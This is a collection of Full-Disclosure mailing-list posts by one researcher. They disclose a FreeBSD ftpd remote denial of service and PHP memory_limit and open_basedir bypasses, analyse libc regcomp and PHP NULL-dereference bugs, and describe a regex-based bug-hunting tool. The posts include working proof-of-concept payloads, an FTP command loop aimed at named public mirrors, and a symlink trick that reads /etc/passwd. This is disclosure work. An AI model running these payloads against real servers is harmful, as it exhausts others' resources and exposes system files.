Re: [Full-disclosure] Allegro.pl XSS [0-day]

2013-04-14 Thread Maksymilian Arciemowicz
XSS isn't a critical issue. CVSSv2 rates a standard XSS at ~4.3/10; more
critical are CSRF at ~6.8 or Open Redirect at ~5.8. It makes no sense to
publish an XSS in ONE website on this list! Too many websites are
vulnerable. If someone has a nice XSS in software like phpMyAdmin, it
could be interesting.

--
Best regards,
Maksymilian Arciemowicz ( http://cifrex.org/ )
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Allegro.pl XSS [0-day]

2013-04-11 Thread Maksymilian Arciemowicz
It's not a 0day. Allegro is not a software vendor. It's a website.

--
Best regards,
Maksymilian Arciemowicz ( http://cvemap.org/ )

[Full-disclosure] FreeBSD 9.1 ftpd Remote Denial of Service

2013-02-02 Thread Maksymilian Arciemowicz
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/

Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003

Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...


--- 1. Description ---
I have decided to check BSD ftpd servers once again for wildcards. An old
bug in libc (CVE-2011-0418) allows a Denial of Service of ftpd in the
latest FreeBSD version.
An attacker who can connect anonymously to the FTP server may cause CPU
resource exhaustion. Logging in with 'USER anonymous' 'PASS anonymous'
and sending a 'STAT' command with a special wildcard is enough to create
an ftpd process with 100% CPU usage.

Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include <stdio.h>
#include <glob.h>

int main(void){
    glob_t globbuf;
    /* the brace pattern sent as the STAT argument */
    char
stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
    /* on FreeBSD 9.1 this call spins at 100% CPU: GLOB_LIMIT does not bound brace expansion */
    glob(stringa, GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
    globfree(&globbuf);
    return 0;
}
--- PoC ---

--- Exploit ---
user anonymous
pass anonymous
stat 
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---

Result of attack:
ftp   13034   0.0  0.4  10416   1944  ??  R    10:48PM   0:00.96 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp   13035   0.0  0.4  10416   1944  ??  R    10:48PM   0:00.89 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp   13036   0.0  0.4  10416   1944  ??  R    10:48PM   0:00.73 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp   13046   0.0  0.4  10416   1952  ??  R    10:48PM   0:00.41 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp   13047   0.0  0.4  10416   1960  ??  R    10:48PM   0:00.42 ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root  13219   0.0  0.3  10032   1424  ??  R    10:52PM   0:00.00 /usr/libexec/ftpd -dDA
root  13225   0.0  0.3  10032   1428  ??  R    10:52PM   0:00.00 /usr/libexec/ftpd -dDA
root  13409   0.0  0.3  10032   1404  ??  R    10:53PM   0:00.00 /usr/libexec/ftpd -dDA
root  13410   0.0  0.3  10032   1404  ??  R    10:53PM   0:00.00 /usr/libexec/ftpd -dDA
...

=>Sending:
STAT 
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

=>Result:
@ps:
ftp   1336 100.0  0.5  10416   2360  ??  R    11:15PM  600:39.95 ftpd: 127.0.0.1: anonymous/anonym...@cxsecurity.com: \r\n (ftpd)$
@top:
1336 root   1 103  0 10416K  2360K RUN  600:53 100.00% ftpd

one request with over 600m (~10h) of execution time and 100% CPU usage.
This issue allows creating N ftpd processes with 100% CPU usage.

Just create a while(1) loop and send these commands
---
user anonymous
pass anonymous
stat 
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---

NetBSD and OpenBSD have fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2

The funniest thing is that FreeBSD uses GLOB_LIMIT in the ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
if (strpbrk(whichf, "~{[*?") != NULL) {
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
freeglob = 1;
if (glob(whichf, flags, 0, &gl)) {
---

but GLOB_LIMIT in FreeBSD doesn't work. The glob(3) function allows CPU
resource exhaustion. ;]

Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723

only FreeBSD and GNU glibc are affected


--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233


--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve the
problem with security ;)


--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http:

[Full-disclosure] cIFrex: How to use Regular Expressions in Research

2012-05-01 Thread Maksymilian Arciemowicz
cIFrex is a small script written in PHP, which supports searching for
bugs during analysis of source code. Using a database of filters based
on regular expressions, you can quickly locate the code in which the
probability of a flaw is high. You just need to have the source code on
a computer with access to cIFrex in order to fully benefit from the
possibilities of the new methodology.

Since 2010, cIFrex has been used in my private research. Creating new
filters, I have discovered a lot of bugs like Resource Exhaustion in
libc, apache or vsftpd. The problem with recursion was very easy to
locate. In vsftpd and libc, the PoC contained the '*' char.

-fnmatch()/fnmatch.c--
/* Collapse multiple stars. */
while (c == '*')
-fnmatch()/fnmatch.c--

and

-vsf_filename_passes_filter()/ls.c--
  /* Any incoming string left means no match unless we ended on the correct
   * type of wildcard.
   */
  if (str_getlen(&name_remain_str) > 0 && last_token != '*')
-vsf_filename_passes_filter()/ls.c--

Many stars have been used in the demonstration PoCs for apache and
vsftpd. Intuitively, where there is a '*' char there is also recursion.

Recursion in fnmatch() and vsf_filename_passes_filter() can be
described by:

V1: (?:int |char |^)(?\w+)\(.*
T1: (?:if|while).*\(

to see all files where '*' was used, use the T2 pattern

T2: .*\'\*\'.*

in the result, we retrieve a list of probably vulnerable files. But you
need more luck and good intuition.


Remember that cIFrex:
- only helps to search for bugs
- the search results do not guarantee the presence of vulnerabilities
- the more exact the regular expression, the larger the probability of
finding vulnerabilities


cIFrex may be used to catch bugs not only in the C language. Using a filter like:

V1: (.*echo.*\$_(?:POST|GET)\[(?:\'|\")(?\w+)(?:\'|\")\].*)
F1: htmlspecialchars.*
F2: \(int\)\$_(?:POST|GET)\[..\]

we may catch a lot of Cross Site Scripting (CWE-79) vulnerabilities. Or
SQL Injection (CWE-89) using:

V1: \$(?\w+) \=.*\$_(?:GET|POST)\[(?.*)\]
T1: mysql_query\(.*\$
F1: addslashes.*\$


List of filters
cIFrex filters are based on regular expressions describing a given kind
of mistake together with the CWE identifiers
http://cxsecurity.com/cifrex/filters/


Download
http://cxsecurity.com/cifrex/#download

Download the latest stable version of the code:
http://cxsecurity.com/cifrex_download/1.1/run.txt


CWE Dictionary
http://cxsecurity.com/allcwe/


CVE Full Map
http://cxsecurity.com/cvemap/


More about project
http://cxsecurity.com/cifrex/
http://cxsecurity.com/

-- 
Best Regards
Maksymilian Arciemowicz (CXSecurity.com)
pub   4096R/D6E5B530 2010-09-19
uid  Maksymilian Arciemowicz (cx) 
sub   4096R/58BA663C 2010-09-19


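The V/F filter matching described in the cIFrex post above, as an added C example that is not part of cIFrex (cIFrex itself is a PHP script): POSIX regcomp(3)/regexec(3) apply an ERE rewrite of the XSS filter (V1 for an echo of raw $_GET/$_POST input, F1/F2 for htmlspecialchars and an (int) cast) to a constructed PHP sample and report the lines that match V1 but none of the F patterns. The pattern strings, the sample source and the function names are this example's own assumptions; ERE has no named groups, so the capture from the post's V1 is dropped.

```c
/* Added example, not part of cIFrex: the V/F filter idea applied with
 * POSIX regcomp(3)/regexec(3).  A line is reported when it matches the
 * V (vulnerability) pattern and none of the F (mitigation) patterns.
 * The patterns are ERE rewrites of the XSS filter from the post (ERE has
 * no named groups); the PHP sample below is constructed for the demo. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <regex.h>
#include <stdio.h>
#include <string.h>

/* V1: echo of raw $_GET/$_POST input; F1/F2: output encoding or an int cast */
static const char *V1 = "echo.*\\$_(POST|GET)\\[('|\")[A-Za-z0-9_]+('|\")]";
static const char *F1 = "htmlspecialchars";
static const char *F2 = "\\(int\\)\\$_(POST|GET)\\[";

/* Constructed sample: lines 2 and 4 are the ones a reviewer should see. */
const char *sample_php =
    "<?php\n"
    "echo $_GET['name'];\n"
    "echo htmlspecialchars($_GET['name']);\n"
    "echo \"id=\" . $_POST[\"id\"];\n"
    "echo (int)$_GET['page'];\n"
    "$q = $_GET['q'];\n";

/* 1 if `line` matches `pattern`, 0 if not, -1 if the pattern does not compile */
int re_matches(const char *pattern, const char *line) {
    regex_t re;
    if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0)
        return -1;
    int rc = regexec(&re, line, 0, NULL, 0);
    regfree(&re);
    return rc == 0;
}

/* Scan `src` line by line and record the 1-based numbers of suspicious
 * lines in `hits` (at most `max`).  Returns the total number found. */
int scan_source(const char *src, int *hits, int max) {
    int n = 0, lineno = 0;
    const char *p = src;
    char line[512];
    while (*p != '\0') {
        size_t full = strcspn(p, "\n");            /* length of this line */
        size_t len = full < sizeof line - 1 ? full : sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        lineno++;
        if (re_matches(V1, line) == 1 &&
            re_matches(F1, line) != 1 &&
            re_matches(F2, line) != 1) {
            if (n < max)
                hits[n] = lineno;
            n++;
        }
        p += full;
        if (*p == '\n')
            p++;
    }
    return n;
}

int main(void) {
    int hits[16];
    int n = scan_source(sample_php, hits, 16);
    for (int i = 0; i < n && i < 16; i++)
        printf("possible XSS (CWE-79) at line %d\n", hits[i]);
    return 0;
}
```

A T (trigger) pattern from the post's SQL Injection filter would be applied the same way, as a second required match before the F patterns are consulted; the sample prints the two suspicious line numbers and stays silent on the encoded and cast lines.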

[Full-disclosure] PHP 5.4/5.3 deprecated eregi() memory_limit bypass

2012-03-30 Thread Maksymilian Arciemowicz
[ PHP 5.4/5.3 deprecated eregi() memory_limit bypass ]

Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/
Date: 30.03.2012

Original link:
http://cxsecurity.com/issue/WLB-2012030272

PoC's:
memory_limit poc
http://cxsecurity.com/issue/WLB-2012030271
open_basedir poc
http://cxsecurity.com/issue/WLB-2012030270


--- 1. PHP memory_limit bypass ---
Functions based on POSIX Regular Expressions, e.g. eregi, are deprecated
since PHP 5.3. In the latest version, 5.4.0, we may still use these
functions. This allows us to bypass memory_limit in PHP.

The eregi() function is based on POSIX regexp, whereas preg_match() is
based on PCRE. This is the main difference between these functions.

POSIX Regex Functions Tutorial
http://lu.php.net/manual/en/ref.regex.php

PCRE Functions Tutorial
http://lu.php.net/manual/en/ref.pcre.php

Last year, we published a fix for the regcomp()/libc function from the
NetBSD source. eregi() uses the same source code as the libc of NetBSD.
As a result, we may exhaust the memory limit or the stack in PHP

See our security note:
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102

The script presented below shows how to use eregi() to exhaust memory in PHP

- http://cxsecurity.com/issue/WLB-2012030271 --
<?php
/*
http://cxsecurity.com/
cxib [ a.T] cxsecurity [ d0t] com

To show memory_limit in PHP

# php /www/memlimpoc.php 1 3500
PHP Fatal error:  Allowed memory size of 33554432 bytes exhausted (tried
to allocate 3501 bytes) in /var/www/memlimpoc.php on line 12

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to
allocate 3501 bytes) in /var/www/memlimpoc.php on line 12

and try this

# php /www/memlimpoc.php 2

memory_limit bypassed
*/

ini_set("memory_limit","32M");

if($argv[1]==1)
    $sss=str_repeat("A",$argv[2]);
elseif($argv[1]==2)
eregi("(.?)(((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");

?>
- http://cxsecurity.com/issue/WLB-2012030271 --

Remember. Don't use memory_limit as a main memory limiter.


--- 2. PHP open_basedir bypass ---
The latest PHP version, 5.4.0, brought many changes. safe_mode has been
removed but open_basedir is still available for use. We don't need to
look for new ways to bypass open_basedir. The problem with symlinks is
still present in PHP.

safe_mode tutorial
http://php.net/manual/en/features.safe-mode.php

PoC:
127# cat sym.php

127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www)
in /www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2
127#

open_basedir will disallow /etc/passwd.

Let`s see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php


127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...

now "tmplink" is a directory, so the link "exploit" will be
"../../etc/passwd". We don't need to bypass open_basedir; it is a design
mistake. PHP will allow "tmplink/../../../etc/passwd" because
./tmplink/../../../etc/passwd really exists.

PoC:
http://cxsecurity.com/issue/WLB-2012030270

Remember. Don't use open_basedir as a main security feature.


--- 3. References ---
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102

memory_limit bypass poc
http://cxsecurity.com/issue/WLB-2012030271

PHP 5.2.11/5.3.0 Multiple Vulnerabilities
http://cxsecurity.com/research/70

open_basedir bypass poc
http://cxs

[Full-disclosure] PHP 5.3.8 Multiple vulnerabilities

2012-01-17 Thread Maksymilian Arciemowicz

[ PHP 5.3.8 Multiple vulnerabilities ]

Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/
Date: 14.01.2012

CVE:
CVE-2011-4153 (zend_strndup)

Original link:
http://cxsecurity.com/research/103


[--- 1. Multiple NULL Pointer Dereference with zend_strndup()
[CVE-2011-4153] ---]
As we can see in zend_strndup()

- -zend_alloca.c---
ZEND_API char *zend_strndup(const char *s, uint length)
{
    char *p;

    p = (char *) malloc(length+1);
    if (UNEXPECTED(p == NULL)) {
        return p;                 /* <=== RETURN NULL */
    }
    if (length) {
        memcpy(p, s, length);
    }
    p[length] = 0;
    return p;
}
- -zend_alloca.c---

zend_strndup() may return NULL

In the PHP code, many calls to zend_strndup() don't check the returned
value. As a result, places like:

- -zend_builtin_functions.c---
ZEND_FUNCTION(define)
{
    char *name;
    int name_len;
    zval *val;
    zval *val_free = NULL;
    zend_bool non_cs = 0;
    int case_sensitive = CONST_CS;
    zend_constant c;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sz|b", &name,
                              &name_len, &val, &non_cs) == FAILURE) {
        return;
    }
    ...
    c.flags = case_sensitive; /* non persistent */
    c.name = zend_strndup(name, name_len);   /* < MAY RETURN NULL */
    c.name_len = name_len+1;
    c.module_number = PHP_USER_CONSTANT;
    if (zend_register_constant(&c TSRMLS_CC) == SUCCESS) {
        RETURN_TRUE;
    } else {
        RETURN_FALSE;
    }
}
- -zend_builtin_functions.c---

- -PoC code---
[cx@82 /www]$ ulimit -a
socket buffer size   (bytes, -b) unlimited
core file size  (blocks, -c) unlimited
data seg size   (kbytes, -d) 524288
file size   (blocks, -f) unlimited
max locked memory   (kbytes, -l) unlimited
max memory size (kbytes, -m) 4
open files  (-n) 11095
pipe size(512 bytes, -p) 1
stack size  (kbytes, -s) 65536
cpu time   (seconds, -t) unlimited
max user processes  (-u) 5547
virtual memory  (kbytes, -v) 4
swap size   (kbytes, -w) unlimited
[cx@82 /www]$ cat define.php

- -PoC code---

to see the difference

[cx@82 /www]$ php define.php 899
Out of memory
[cx@82 /www]$ php define.php 999
Segmentation fault: 11

(gdb) bt
#0  0x28745eb0 in strrchr () from /lib/libc.so.7
#1  0x0822d538 in zend_register_constant (c=0xbfbfcfb0)
at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429
#2  0x08251e0e in zif_define (ht=2, return_value=0x28825a98,
return_value_ptr=0x0, this_ptr=0x0, return_value_used=0)
at /usr/ports/lang/php5/work/php/Zend/zend_builtin_functions.c:688
#3  0x0826dba6 in zend_do_fcall_common_helper_SPEC
(execute_data=0x29401040)
at zend_vm_execute.h:316


There are other places where zend_strndup() is used:

- -1--
ext/soap/php_sdl.c
if (sdl->is_persistent) {
new_enc->details.ns = zend_strndup(ns, ns_len);
new_enc->details.type_str = 
strdup(new_enc->details.type_str);
} else {
new_enc->details.ns = estrndup(ns, ns_len);
new_enc->details.type_str = 
estrdup(new_enc->details.type_str);
}
- -1--

- -2--
ext/standard/syslog.c
BG(syslog_device) = zend_strndup(ident, ident_len);
openlog(BG(syslog_device), option, facility);
RETURN_TRUE;
- -2--

- -3--
ext/standard/browscap.c
} else { /* Other than true/false setting */
Z_STRVAL_P(new_property) = 
zend_strndup(Z_STRVAL_P(arg2),
Z_STRLEN_P(arg2));
Z_STRLEN_P(new_property) = 
Z_STRLEN_P(arg2);
}
new_key = zend_strndup(Z_STRVAL_P(arg1), 
Z_STRLEN_P(arg1));
zend_str_tolower(new_key, Z_STRLEN_P(arg1));
zend_hash_update(Z_ARRVAL_P(current_section), 
new_key,
Z_STRLEN_P(arg1) + 1, &new_property, sizeof(zval *), NULL);
free(new_key);
- -3--

- -4--
ext/oci8/oci8.c
if (alloc_non_persistent) {
connection = (php_oci_connection *) ecalloc(1,
sizeof(php_oci_connection));
connection->hash_key = estrndup(hashed_details.c, 
hashed_details.len);
connection->is_persistent = 0;
} else {
connection = (php_oci_connection *) calloc(1,
sizeof(php_oci_connection));
connection->hash_key = zend_strndup(hashed_details.c,
hashed_details.len);

[Full-disclosure] Multiple BSD libc/regcomp(3) Multiple Vulnerabilities

2011-11-04 Thread Maksymilian Arciemowicz

[ Multiple BSD libc/regcomp(3) Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://www.netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

Date:
- - Dis.: 05.10.2011
- - Pub.: 04.11.2011

CVE: CVE-2011-3336

Affected Software:
- - NetBSD 5.1 (fixed)
- - OpenBSD 5.0
- - FreeBSD 8.2
- - MacOSX


Original URL:
http://securityreason.com/achievement_securityalert/102


- --- 0.Description ---
regcomp() compiles the regular expression contained in the pattern
string, subject to the flags in cflags, and places the results in the
regex_t structure pointed to by preg.

cflags is the bitwise OR of zero or more of the following flags:

REG_EXTENDED
Compile modern (extended) REs, rather than the obsolete (basic) REs that
are the default.

REG_BASIC
This is a synonym for 0, provided as a counterpart to REG_EXTENDED to
improve readability.


- --- 1.  Multiple BSD libc/regcomp(3) Multiple Vulnerabilities ---
In regcomp(3) of the BSD implementation, I've discovered several flaws.
A similar problem was diagnosed one year ago in GNU libc (01.10.2010).
But the GNU regcomp() code is different from BSD's.

Recursion and bad memory management may lead to an unexpected end of the
application. Together with NetBSD we have decided to fix all these
flaws. Most important was a limit on recursion for REG_EXTENDED and
REG_BASIC, and getting better control over memory usage.

A specifically crafted .ftpaccess file can return a result as below
- -proftpd---
# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3f Server (ProFTPD Default Installation) [127.0.0.1]
user dude
331 Password required for dude
pass dude

and in the same time

# gdb -q proftpd 15814
(no debugging symbols found)
Attaching to program: /usr/local/sbin/proftpd, process 15814
Reading symbols from /usr/lib/libutil.so.11.2...done.
Loaded symbols for /usr/lib/libutil.so.11.2
Reading symbols from /usr/lib/libc.so.58.0...done.
Loaded symbols for /usr/lib/libc.so.58.0
Reading symbols from /usr/libexec/ld.so...done.
Loaded symbols for /usr/libexec/ld.so
0x001f39e9 in select () from /usr/lib/libc.so.58.0
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0026d951 in memcpy () from /usr/lib/libc.so.58.0

crash in regcomp()

...
assert(finish >= start);
if (len == 0)
return(ret);
enlarge(p, p->ssize + len); /* this many unexpected additions */
assert(p->ssize >= p->slen + len);
(void)memcpy(p->strip + p->slen, p->strip + start,
(size_t)len * sizeof(sop));
...
(gdb) x/i $eip
0x2d42951 :  repz movsl %ds:(%esi),%es:(%edi)
...
- -proftpd---


Uncontrolled memory exhaustion allows creating an RE that consumes all
free memory. As we can read in the manual:

- -man regcomp 3--
regexec() performance is poor.  This will improve with later releases.
nmatch exceeding 0 is expensive; nmatch exceeding 1 is worse.
regexec is largely insensitive to RE complexity except that back
references are massively expensive.  RE length does matter; in
particular, there is a strong speed bonus for keeping RE length under
about 30 characters, with most special characters counting roughly double.

regcomp() implements bounded repetitions by macro expansion, which is
costly in time and space if counts are large or bounded repetitions are
nested.  An RE like, say, `a{1,100}){1,100}){1,100}){1,100}){1,100}'
will (eventually) run almost any existing machine out of swap space.
- -man regcomp 3--

Using an RE like `a{1,100}){1,100}){1,100}){1,100}){1,100}' may lead to
running out of swap space. It can be helpful to attack the last stable
version of proftpd.

To fix the memory exhaustion problem, we should create some limit on
memory usage. In my opinion 128MB is an optimal limit for one regcomp(3)
call. Then a function checking memory usage like the one below

- -part-of-fix--
214: #define MEMLIMIT 0x800
215: #define MEMSIZE(p) \
216:     ((p)->ncsalloc / CHAR_BIT * (p)->g->csetsize + \
217:     (p)->ncsalloc * sizeof(cset) + \
218:     (p)->ssize * sizeof(sop))
219: #define RECLIMIT 256
- -part-of-fix--

should solve the problem with memory exhaustion.

In regcomp() we have a few recursion loops:
- - p_ere <> p_ere_exp
- - p_bre <> p_bre_exp
- - repeat

We need to create a limit for the two main functions p_ere and p_bre_exp

#define RECLIMIT 256

- -REG_EXTENDED---
341: p_ere(
342:     struct parse *p,
343:     int stop,  /* character this ERE should end at */
344:     size_t reclimit)
345: {
...
351:
352:     _DIAGASSERT(p != NULL);
353:
354:     if (reclimit++ > RECLIMIT || p->error == REG_ESPACE) {
355:         p->error = REG_ESPACE;
356:         return;
357:     }
358:
359:     for (;;) {
360:         /* do a bunch of concatenated expressions */
361:
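The recursion limit shown in the p_ere() fragment above, as an added C example that is neither NetBSD's nor regcomp(3)'s code: a toy parser for nested "(...)" groups threads the same reclimit counter through its recursive call and fails with an ESPACE-style error once it passes RECLIMIT (256, the value in the fix) instead of recursing until the stack is exhausted. The parser, its error codes and the generated inputs are this example's own assumptions.

```c
/* Added example, not NetBSD's code: the recursion-limit technique from the
 * regcomp(3) fix, applied to a toy parser for nested "(...)" groups.  As in
 * the fixed p_ere(), the recursive function carries a depth counter and
 * fails with an ESPACE-style error once it passes RECLIMIT, instead of
 * recursing until the stack is exhausted.  RECLIMIT is the value shown in
 * the fix; the parser, error codes and inputs are constructed for the demo. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RECLIMIT 256

enum { PARSE_OK = 0, PARSE_EPAREN = 1, PARSE_ESPACE = 2 };

/* Parse a group body starting at *pos until `stop` (')' or NUL).
 * Returns PARSE_OK, PARSE_EPAREN on unbalanced parentheses, or
 * PARSE_ESPACE when nesting exceeds RECLIMIT. */
static int p_group(const char *s, size_t *pos, char stop, size_t reclimit) {
    if (reclimit++ > RECLIMIT)
        return PARSE_ESPACE;           /* the check the fix adds to p_ere() */
    for (;;) {
        char c = s[*pos];
        if (c == stop)
            return PARSE_OK;
        if (c == '\0' || c == ')')
            return PARSE_EPAREN;       /* missing ')' or stray ')' */
        (*pos)++;
        if (c == '(') {
            int rc = p_group(s, pos, ')', reclimit);
            if (rc != PARSE_OK)
                return rc;
            (*pos)++;                  /* consume the matching ')' */
        }
    }
}

int parse_pattern(const char *pattern) {
    size_t pos = 0;
    return p_group(pattern, &pos, '\0', 0);
}

/* Build "((( ... a ... )))" with `depth` nesting levels and parse it. */
int parse_nested(size_t depth) {
    char *buf = malloc(2 * depth + 2);
    if (buf == NULL)
        return -1;
    memset(buf, '(', depth);
    buf[depth] = 'a';
    memset(buf + depth + 1, ')', depth);
    buf[2 * depth + 1] = '\0';
    int rc = parse_pattern(buf);
    free(buf);
    return rc;
}

int main(void) {
    printf("a(b(c))        -> %d\n", parse_pattern("a(b(c))"));
    printf("a(b            -> %d\n", parse_pattern("a(b"));
    printf("%d levels deep -> %d\n", RECLIMIT, parse_nested(RECLIMIT));
    printf("1000 levels    -> %d (ESPACE, no stack overflow)\n", parse_nested(1000));
    return 0;
}
```

The counter is passed by value, so sibling groups at the same level do not accumulate; only true nesting depth counts, which is what protects the stack while leaving long but flat patterns alone.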

Re: [Full-disclosure] New Opera 11.51 PoC Denial of Service (pigtail23)

2011-10-22 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

stack exhaustion. It seems to be a recursion problem for basic regular
expressions. The same or a similar problem exists in PCRE 8.12, allowing
one to crash multiple applications

cx@cx64:/www$ cat crash0.php

cx@cx64:/www$ php crash0.php
Segmentation fault

or some time ago for apache,

127# cat .htaccess
RewriteEngine On
RewriteBase   /rcrash
RewriteRule gun((.*){2000,}(\s*){2000,}.*) /ygy
127# curl http://127.0.0.1/rcrash/gun
curl: (52) Empty reply from server

[Mon Jul 11 02:40:39 2011] [notice] child pid 1343 exit signal Illegal
instruction (4)

Program received signal SIGSEGV, Segmentation fault.
0x08097a9b in match (eptr=0xbb777b07 "", ecode=0xbb76ab6f "*\bB",
offset_top=8, md=0xbfbfe284, ims=0, eptrb=0xbfa02014, flags=2)
at pcre.c:7997
7997c = *ecode++ - OP_TYPESTAR;

that is the same problem.

- --
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid      Maksymilian Arciemowicz (cx) 
